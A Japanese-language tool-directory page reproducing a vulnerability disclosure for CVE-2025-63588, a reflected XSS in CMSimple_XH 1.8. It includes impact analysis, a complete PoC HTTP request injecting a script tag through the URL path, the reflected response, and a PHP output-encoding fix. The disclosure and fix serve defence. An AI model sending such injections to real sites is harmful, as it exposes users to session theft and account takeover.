Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-63588 — CVE-2025-63588の詳細な概念実証、CMSimple_XH 1.8における反射型XSS脆弱性、CVSSスコアリング、影響分析、およびセキュアコーディングによる修正例を含む。 | Kitploit
ツール/GitHubGitHub/cybercrewinc/cve-2025-63588
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育
GitHubcybercrewinc/cve-2025-63588

CVE-2025-63588

CVE-2025-63588の詳細な概念実証、CMSimple_XH 1.8における反射型XSS脆弱性、CVSSスコアリング、影響分析、およびセキュアコーディングによる修正例を含む。

リポジトリを見る
9ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-63588 CMSimple_XH の cmsimplexh パス処理における Reflected Cross-Site Scripting (XSS)

推定 CVSS v3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (Medium) 割り当て CVE: CVE-2025-63588
対象製品: CMSimple_XH - 1.8 ベンダー: CMSimple_XH - https://www.cmsimple-xh.org/

概要

CMSimple_XH のフロントルーター解析コードには、動的なログイン関連入力を処理する際に Reflected Cross-Site Scripting (XSS) の脆弱性が存在します。アプリケーションは、リクエスト URI から取得した攻撃者制御のデータを、適切な出力エンコーディングを行わずに生成された HTML(例:フォームの action 属性やアンカーの href)に直接反映します。攻撃者は、被害者がアクセスした際に任意の JavaScript が脆弱なサイトのコンテキストで実行されるような URL を作成できます。

これは Reflected XSS(非永続型)であり、悪用には被害者が細工されたリンクをたどる必要があります。ベンダーには通知済みであり、この問題は文書化され、上記の CVE が割り当てられています。

影響

  • クライアントサイドコード実行 — サイトのコンテキストで任意の JavaScript が実行される可能性があります。
  • 情報漏洩 — スクリプトは DOM コンテンツおよびクライアントからアクセス可能な Cookie やトークンを読み取ることができます。セッション Cookie に HttpOnly が設定されていない場合、セッショントークンが窃取される可能性があります。
  • セッションハイジャック / なりすまし — トークンの流出により、被害者の権限に応じてアカウントが乗っ取られる可能性があります。
  • フィッシング / UI スプーフィング / 強制操作 — 注入されたスクリプトは偽の UI を作成したり、ユーザーをリダイレクトしたり、被害者のセッション下でアクションを送信したりできます。

影響を受けるコンポーネント

この脆弱性は、動的なパスセグメントを解析しページ/テンプレート変数にマッピングするフロントルーター / index.php(または同等のフロントコントローラー)のコードに起因します。生のパスフラグメント(CMSimple_XH のルーターが使用する ?Templates... スタイルのフラグメント)がページテンプレートに渡され、適切な HTML 属性エンコーディングやサニタイズなしに HTML 属性に注入されるため、注入された <script> タグやその他のペイロードがそのままレンダリングされます。同様の Reflected XSS の問題は他の Web コンポーネントでも公開されており、信頼できない入力の出力エンコーディング不備が一般的な原因です。

概念実証 (PoC)

この PoC は、攻撃者が提供した入力が返される HTML に反映され、被害者のブラウザで実行されることを示します。

リクエスト:

root@kitploit:~
POST /cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9 HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates&login
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 45

login=true&keycut=z9U%21q2k%21F0&submit=Login
貼り付け画像 20251006200014

レスポンス:

root@kitploit:~
HTTP/1.1 200 OK
Host: 192.168.98.129:8080
Date: Mon, 06 Oct 2025 02:50:49 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Set-Cookie: XH_2f636d73696d706c6578682f=v7hkld81biddtmoua1maptd18a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>English Site Title – Login</title>
<meta name="robots" content="noindex">
<meta name="keywords" content="Enter list of comma separated keywords here">
<meta name="description" content="Enter website description for search engine results here">
<link rel="stylesheet" href="./assets/css/xhstyles.css" type="text/css">
<link rel="stylesheet" href="./templates/fhs-simple-2019/stylesheet.css" type="text/css">
<meta name="robots" content="noindex">
</head>
<body class="xh_login" onload="document.forms['login'].elements['keycut'].focus();">
<div class="xh_login"><h1>Login</h1><p class="xh_fail">You have entered a wrong password!</p><p><b>Site administration. Please enter password.</b></p><form id="login" name="login" action="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9" method="post"><input type="hidden" name="login" value="true"><input type="password" name="keycut" id="passwd" value=""> <input type="submit" name="submit" id="submit" value="Login"></form><p><a href="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9">Back</a></p> </div></body>
</html>
貼り付け画像 20251006200122

被害者のブラウザがこのページをレンダリングすると、注入された <script>alert(1)</script> が実行されます。 貼り付け画像 20251006204432 貼り付け画像 20251006204517

action 属性を安全に出力する PHP の推奨例:

root@kitploit:~
$action_url = '/cmsimplexh/?' . rawurlencode($template_token);
echo '<form action="' . htmlspecialchars($action_url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '" method="post">';

クレジット

クレジット

割り当て CVE:** CVE-2025-63588

https://nvd.nist.gov/vuln/detail/CVE-2025-63588

発見者:株式会社CyberCrew / サイバークル

参考文献

https://github.com/cmsimple-xh/cmsimple-xh/releases https://nvd.nist.gov/vuln/detail/CVE-2025-24576


✉️ お問い合わせ先

ご質問・ご相談などございましたら、お気軽にご連絡ください。


🏢 株式会社CyberCrew

G1@4x

📞 Tel: 03-6853-5823
📧 Mail:[email protected]


📄 会社概要

項目内容
会社名株式会社CyberCrew
所在地東京都千代田区外神田1-18-13 秋葉原ダイビル6階

🔐 主なサービス

🛡️ セキュリティ診断・リスク評価

組織の脆弱性を多角的に分析し、最適な改善策を提案します。

💻 ペネトレーションテスト

標的型・シナリオ型・LLMペンテスト まで対応。

🌒 ダークウェブモニタリング

機密情報の流出を早期に検知し、迅速に対応。

🎯 REDチーム演習・ソーシャルエンジニアリング

実践的な攻撃シナリオに基づく防御力評価を実施。

🧠 セキュアシステム設計・コンサルティング

開発初期段階からセキュリティを考慮した設計を支援します。


🌐 公式サイト:https://www.cybercrew.co.jp
🕒 CyberCrew — あなたの信頼できるセキュリティパートナー。

ツールをダウンロード